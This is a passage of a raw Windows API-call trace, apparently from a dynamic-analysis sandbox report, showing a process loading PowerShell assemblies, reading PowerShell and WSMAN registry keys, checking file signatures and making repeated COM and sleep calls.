Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xdaf4f8 | out: ppvObject=0xdaf4f8*=0x320a794) returned 0x0 [0232.478] IComThreadingInfo:GetCurrentThreadType (in: This=0x320a794, pThreadType=0xdaf524 | out: pThreadType=0xdaf524*=0) returned 0x0 [0232.479] IUnknown:Release (This=0x320a794) returned 0x0 [0232.680] CoGetContextToken (in: pToken=0xdaf4d4 | out: pToken=0xdaf4d4) returned 0x0 [0232.680] IUnknown:QueryInterface (in: This=0x320a788, riid=0x73ae5e8c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xdaf4f8 | out: ppvObject=0xdaf4f8*=0x320a794) returned 0x0 [0232.680] IComThreadingInfo:GetCurrentThreadType (in: This=0x320a794, pThreadType=0xdaf524 | out: pThreadType=0xdaf524*=0) returned 0x0 [0232.681] IUnknown:Release (This=0x320a794) returned 0x0 [0232.920] CoGetContextToken (in: pToken=0xdaf4d4 | out: pToken=0xdaf4d4) returned 0x0 [0232.920] IUnknown:QueryInterface (in: This=0x320a788, riid=0x73ae5e8c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xdaf4f8 | out: ppvObject=0xdaf4f8*=0x320a794) returned 0x0 [0232.920] IComThreadingInfo:GetCurrentThreadType (in: This=0x320a794, pThreadType=0xdaf524 | out: pThreadType=0xdaf524*=0) returned 0x0 [0232.921] IUnknown:Release (This=0x320a794) returned 0x0 [0233.118] CoGetContextToken (in: pToken=0xdaf4d4 | out: pToken=0xdaf4d4) returned 0x0 [0233.118] IUnknown:QueryInterface (in: This=0x320a788, riid=0x73ae5e8c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xdaf4f8 | out: ppvObject=0xdaf4f8*=0x320a794) returned 0x0 [0233.118] IComThreadingInfo:GetCurrentThreadType (in: This=0x320a794, pThreadType=0xdaf524 | out: pThreadType=0xdaf524*=0) returned 0x0 [0233.118] IUnknown:Release (This=0x320a794) returned 0x0 [0233.327] CoGetContextToken (in: pToken=0xdaf4d4 | out: pToken=0xdaf4d4) returned 0x0 [0233.327] IUnknown:QueryInterface (in: This=0x320a788, riid=0x73ae5e8c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xdaf4f8 | out: ppvObject=0xdaf4f8*=0x320a794) returned 0x0 [0233.327] IComThreadingInfo:GetCurrentThreadType (in: This=0x320a794, pThreadType=0xdaf524 | out: pThreadType=0xdaf524*=0) returned 0x0 [0233.327] IUnknown:Release (This=0x320a794) returned 0x0 [0233.526] CoGetContextToken (in: pToken=0xdaf4d4 | out: pToken=0xdaf4d4) returned 0x0 [0233.526] IUnknown:QueryInterface (in: This=0x320a788, riid=0x73ae5e8c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xdaf4f8 | out: ppvObject=0xdaf4f8*=0x320a794) returned 0x0 [0233.526] IComThreadingInfo:GetCurrentThreadType (in: This=0x320a794, pThreadType=0xdaf524 | out: pThreadType=0xdaf524*=0) returned 0x0 [0233.526] IUnknown:Release (This=0x320a794) returned 0x0 [0233.727] CoGetContextToken (in: pToken=0xdaf4d4 | out: pToken=0xdaf4d4) returned 0x0 [0233.727] IUnknown:QueryInterface (in: This=0x320a788, riid=0x73ae5e8c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xdaf4f8 | out: ppvObject=0xdaf4f8*=0x320a794) returned 0x0 [0233.727] IComThreadingInfo:GetCurrentThreadType (in: This=0x320a794, pThreadType=0xdaf524 | out: pThreadType=0xdaf524*=0) returned 0x0 [0233.728] IUnknown:Release (This=0x320a794) returned 0x0 Thread: id = 15 os_tid = 0x1110 Thread: id = 16 os_tid = 0x1150 Thread: id = 17 os_tid = 0x1140 [0107.066] CoGetContextToken (in: pToken=0x4c3fa84 | out: pToken=0x4c3fa84) returned 0x0 [0107.066] CObjectContext::QueryInterface () returned 0x0 [0107.066] CObjectContext::GetCurrentThreadType () returned 0x0 [0107.067] Release () returned 0x0 [0107.067] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0107.067] RoInitialize () returned 0x1 [0107.067] RoUninitialize () returned 0x0 [0182.874] CoGetContextToken (in: pToken=0x4c3fa70 | out: pToken=0x4c3fa70) returned 0x0 [0182.874] CoGetContextToken (in: pToken=0x4c3f9f0 | out: pToken=0x4c3f9f0) returned 0x0 [0182.874] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::Release () returned 0x1 [0182.874] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::Release () returned 0x0 [0182.877] CertFreeCertificateContext (pCertContext=0x75dbe08) returned 1 [0182.879] CloseHandle (hObject=0x63c) returned 1 [0182.880] CloseHandle (hObject=0x414) returned 1 [0197.668] SleepEx (dwMilliseconds=0x5, bAlertable=0) returned 0x0 [0197.684] RegCloseKey (hKey=0x6a0) returned 0x0 [0197.685] RegCloseKey (hKey=0x754) returned 0x0 [0220.129] CertFreeCertificateContext (pCertContext=0x7887030) returned 1 [0220.130] RegCloseKey (hKey=0x844) returned 0x0 [0224.885] CertFreeCertificateContext (pCertContext=0x768a190) returned 1 [0224.977] CloseHandle (hObject=0x8b4) returned 1 [0224.977] CertFreeCertificateContext (pCertContext=0x768a0f0) returned 1 [0231.776] EtwEventUnregister (RegHandle=0x31da838) returned 0x0 [0231.776] EtwEventUnregister (RegHandle=0x31d9e18) returned 0x0 [0231.776] EtwEventUnregister (RegHandle=0x75e8b20) returned 0x0 [0231.776] EtwEventUnregister (RegHandle=0x75e8bf8) returned 0x0 [0231.776] EtwEventUnregister (RegHandle=0x75e8538) returned 0x0 [0231.776] EtwEventUnregister (RegHandle=0x75e7608) returned 0x0 [0231.776] EtwEventUnregister (RegHandle=0x76b9ff0) returned 0x0 [0231.777] EtwEventUnregister (RegHandle=0x76bb940) returned 0x0 [0231.788] SetEvent (hEvent=0x6a4) returned 1 [0231.789] CoGetContextToken (in: pToken=0x4c3f7c4 | out: pToken=0x4c3f7c4) returned 0x0 [0231.790] IUnknown:QueryInterface (in: This=0x320a788, riid=0x73ae5e8c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4c3f7e8 | out: ppvObject=0x4c3f7e8*=0x320a794) returned 0x0 [0231.790] IComThreadingInfo:GetCurrentThreadType (in: This=0x320a794, pThreadType=0x4c3f814 | out: pThreadType=0x4c3f814*=0) returned 0x0 [0231.790] IUnknown:Release (This=0x320a794) returned 0x0 Thread: id = 18 os_tid = 0x1160 Thread: id = 19 os_tid = 0x1164 Thread: id = 20 os_tid = 0x25c Thread: id = 21 os_tid = 0xff8 [0121.115] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0121.116] CoGetContextToken (in: pToken=0x520f584 | out: pToken=0x520f584) returned 0x0 [0121.116] CObjectContext::QueryInterface () returned 0x0 [0121.116] CObjectContext::GetCurrentThreadType () returned 0x0 [0121.116] Release () returned 0x0 [0121.116] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0121.117] CoUninitialize () [0121.117] RoInitialize () returned 0x1 [0121.117] RoUninitialize () returned 0x0 [0122.194] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x104, lpBuffer=0x323c268, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87 [0122.206] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x88 [0122.206] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x88, lpBuffer=0x323c268, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87 [0122.208] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x520e920) returned 1 [0122.208] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.management.automation\\v4.0_3.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x520e99c | out: lpFileInformation=0x520e99c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71ce8766, ftCreationTime.dwHighDateTime=0x1d32794, ftLastAccessTime.dwLowDateTime=0x71ce8766, ftLastAccessTime.dwHighDateTime=0x1d32794, ftLastWriteTime.dwLowDateTime=0x71d0e9d1, ftLastWriteTime.dwHighDateTime=0x1d32794, nFileSizeHigh=0x0, nFileSizeLow=0x623400)) returned 1 [0122.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x520e91c) returned 1 [0122.214] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x520ea10 | out: lpdwHandle=0x520ea10) returned 0x94c [0122.875] GetFileVersionInfoW (in: lptstrFilename="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x531a0ec | out: lpData=0x531a0ec) returned 1 [0122.876] VerQueryValueW (in: pBlock=0x531a0ec, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x520e9e4, puLen=0x520e9e0 | out: lplpBuffer=0x520e9e4*=0x531a188, puLen=0x520e9e0) returned 1 [0123.051] VerQueryValueW (in: pBlock=0x531a0ec, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x520e964, puLen=0x520e960 | out: lplpBuffer=0x520e964*=0x531a264, puLen=0x520e960) returned 1 [0123.051] VerQueryValueW (in: pBlock=0x531a0ec, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x520e964, puLen=0x520e960 | out: lplpBuffer=0x520e964*=0x531a2b8, puLen=0x520e960) returned 1 [0123.051] VerQueryValueW (in: pBlock=0x531a0ec, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x520e964, puLen=0x520e960 | out: lplpBuffer=0x520e964*=0x531a314, puLen=0x520e960) returned 1 [0123.051] VerQueryValueW (in: pBlock=0x531a0ec, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x520e964, puLen=0x520e960 | out: lplpBuffer=0x520e964*=0x531a354, puLen=0x520e960) returned 1 [0123.051] VerQueryValueW (in: pBlock=0x531a0ec, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x520e964, puLen=0x520e960 | out: lplpBuffer=0x520e964*=0x531a3bc, puLen=0x520e960) returned 1 [0123.052] VerQueryValueW (in: pBlock=0x531a0ec, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x520e964, puLen=0x520e960 | out: lplpBuffer=0x520e964*=0x531a458, puLen=0x520e960) returned 1 [0123.052] VerQueryValueW (in: pBlock=0x531a0ec, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x520e964, puLen=0x520e960 | out: lplpBuffer=0x520e964*=0x531a4bc, puLen=0x520e960) returned 1 [0123.052] VerQueryValueW (in: pBlock=0x531a0ec, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x520e964, puLen=0x520e960 | out: lplpBuffer=0x520e964*=0x531a538, puLen=0x520e960) returned 1 [0123.052] VerQueryValueW (in: pBlock=0x531a0ec, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x520e964, puLen=0x520e960 | out: lplpBuffer=0x520e964*=0x531a1e0, puLen=0x520e960) returned 1 [0123.052] VerQueryValueW (in: pBlock=0x531a0ec, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x520e964, puLen=0x520e960 | out: lplpBuffer=0x520e964*=0x0, puLen=0x520e960) returned 0 [0123.052] VerQueryValueW (in: pBlock=0x531a0ec, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x520e964, puLen=0x520e960 | out: lplpBuffer=0x520e964*=0x0, puLen=0x520e960) returned 0 [0123.053] VerQueryValueW (in: pBlock=0x531a0ec, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x520e964, puLen=0x520e960 | out: lplpBuffer=0x520e964*=0x0, puLen=0x520e960) returned 0 [0123.053] VerQueryValueW (in: pBlock=0x531a0ec, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x520e958, puLen=0x520e954 | out: lplpBuffer=0x520e958*=0x531a188, puLen=0x520e954) returned 1 [0123.054] VerLanguageNameW (in: wLang=0x0, szLang=0x520e6e8, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0123.054] VerQueryValueW (in: pBlock=0x531a0ec, lpSubBlock="\\", lplpBuffer=0x520e968, puLen=0x520e964 | out: lplpBuffer=0x520e968*=0x531a114, puLen=0x520e964) returned 1 [0123.076] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x520e9a8 | out: phkResult=0x520e9a8*=0x374) returned 0x0 [0123.077] RegQueryValueExW (in: hKey=0x374, lpValueName="ServiceStackVersion", lpReserved=0x0, lpType=0x520e9c8, lpData=0x0, lpcbData=0x520e9c4*=0x0 | out: lpType=0x520e9c8*=0x1, lpData=0x0, lpcbData=0x520e9c4*=0x8) returned 0x0 [0123.077] RegQueryValueExW (in: hKey=0x374, lpValueName="ServiceStackVersion", lpReserved=0x0, lpType=0x520e9c8, lpData=0x5320874, lpcbData=0x520e9c4*=0x8 | out: lpType=0x520e9c8*=0x1, lpData="3.0", lpcbData=0x520e9c4*=0x8) returned 0x0 [0123.079] RegCloseKey (hKey=0x374) returned 0x0 [0123.080] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x520f0c8 | out: phkResult=0x520f0c8*=0x374) returned 0x0 [0123.081] RegQueryValueExW (in: hKey=0x374, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x520f0e8, lpData=0x0, lpcbData=0x520f0e4*=0x0 | out: lpType=0x520f0e8*=0x1, lpData=0x0, lpcbData=0x520f0e4*=0x56) returned 0x0 [0123.081] RegQueryValueExW (in: hKey=0x374, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x520f0e8, lpData=0x5320b64, lpcbData=0x520f0e4*=0x56 | out: lpType=0x520f0e8*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x520f0e4*=0x56) returned 0x0 [0123.081] RegCloseKey (hKey=0x374) returned 0x0 [0123.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0123.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0123.084] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x520f084) returned 1 [0123.084] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x520f100 | out: lpFileInformation=0x520f100*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fe5a6a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9fe5a6a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9fe5a6a2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x7780)) returned 1 [0123.088] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x520f080) returned 1 [0123.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0123.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0123.091] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x520f090 | out: phkResult=0x520f090*=0x374) returned 0x0 [0123.092] RegQueryValueExW (in: hKey=0x374, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x520f0b0, lpData=0x0, lpcbData=0x520f0ac*=0x0 | out: lpType=0x520f0b0*=0x1, lpData=0x0, lpcbData=0x520f0ac*=0x56) returned 0x0 [0123.092] RegQueryValueExW (in: hKey=0x374, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x520f0b0, lpData=0x5321220, lpcbData=0x520f0ac*=0x56 | out: lpType=0x520f0b0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x520f0ac*=0x56) returned 0x0 [0123.092] RegCloseKey (hKey=0x374) returned 0x0 [0125.417] CoTaskMemAlloc (cb=0x20c) returned 0x3246ba8 [0125.418] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x3246ba8 | out: pszPath="C:\\WINDOWS\\system32") returned 0x0 [0125.424] CoTaskMemFree (pv=0x3246ba8) [0125.424] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0125.424] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0125.425] CoTaskMemAlloc (cb=0x20c) returned 0x3246ba8 [0125.425] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x3246ba8 | out: pszPath="C:\\WINDOWS\\SysWOW64") returned 0x0 [0125.427] CoTaskMemFree (pv=0x3246ba8) [0125.427] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\SysWOW64", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0125.427] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\SysWOW64", nBufferLength=0x14, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\SysWOW64", lpFilePart=0x0) returned 0x13 [0125.428] CoTaskMemAlloc (cb=0x20c) returned 0x3246ba8 [0125.428] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x3246ba8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0125.430] CoTaskMemFree (pv=0x3246ba8) [0125.431] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x17 [0125.431] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x17, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)", lpFilePart=0x0) returned 0x16 [0125.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0125.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0125.438] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x520eff8) returned 1 [0125.439] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x520f074 | out: lpFileInformation=0x520f074*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fe5a6a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9fe5a6a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9fe5a6a2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x7780)) returned 1 [0125.439] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x520eff4) returned 1 [0125.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0125.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0125.440] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x520efcc) returned 1 [0125.442] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x414 [0125.443] GetFileType (hFile=0x414) returned 0x1 [0125.443] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x520efc8) returned 1 [0125.443] GetFileType (hFile=0x414) returned 0x1 [0126.068] WTGetSignatureInfo () returned 0x0 [0132.673] CertDuplicateCertificateContext (pCertContext=0x75dbe08) returned 0x75dbe08 [0133.769] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x520f030 | out: phkResult=0x520f030*=0x62c) returned 0x0 [0133.770] RegQueryValueExW (in: hKey=0x62c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x520f050, lpData=0x0, lpcbData=0x520f04c*=0x0 | out: lpType=0x520f050*=0x1, lpData=0x0, lpcbData=0x520f04c*=0x56) returned 0x0 [0133.770] RegQueryValueExW (in: hKey=0x62c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x520f050, lpData=0x535eb40, lpcbData=0x520f04c*=0x56 | out: lpType=0x520f050*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x520f04c*=0x56) returned 0x0 [0133.770] RegCloseKey (hKey=0x62c) returned 0x0 [0133.771] CoTaskMemAlloc (cb=0x10) returned 0x7666a20 [0133.771] CoTaskMemAlloc (cb=0x30) returned 0x76bf4f8 [0133.772] WinVerifyTrust () returned 0x0 [0133.776] CoTaskMemFree (pv=0x76bf4f8) [0133.777] CoTaskMemFree (pv=0x7666a20) [0133.777] CertFreeCertificateContext (pCertContext=0x75dbe08) returned 1 [0133.778] CloseHandle (hObject=0x414) returned 1 [0133.972] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.073] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.135] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.199] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.244] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.290] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.339] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.399] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.447] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.494] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.495] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.496] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.498] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.498] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.499] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.499] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.515] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.515] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.524] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.572] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.574] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.574] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.575] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.577] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.578] SleepEx (dwMilliseconds=0x0, bAlertable=0) 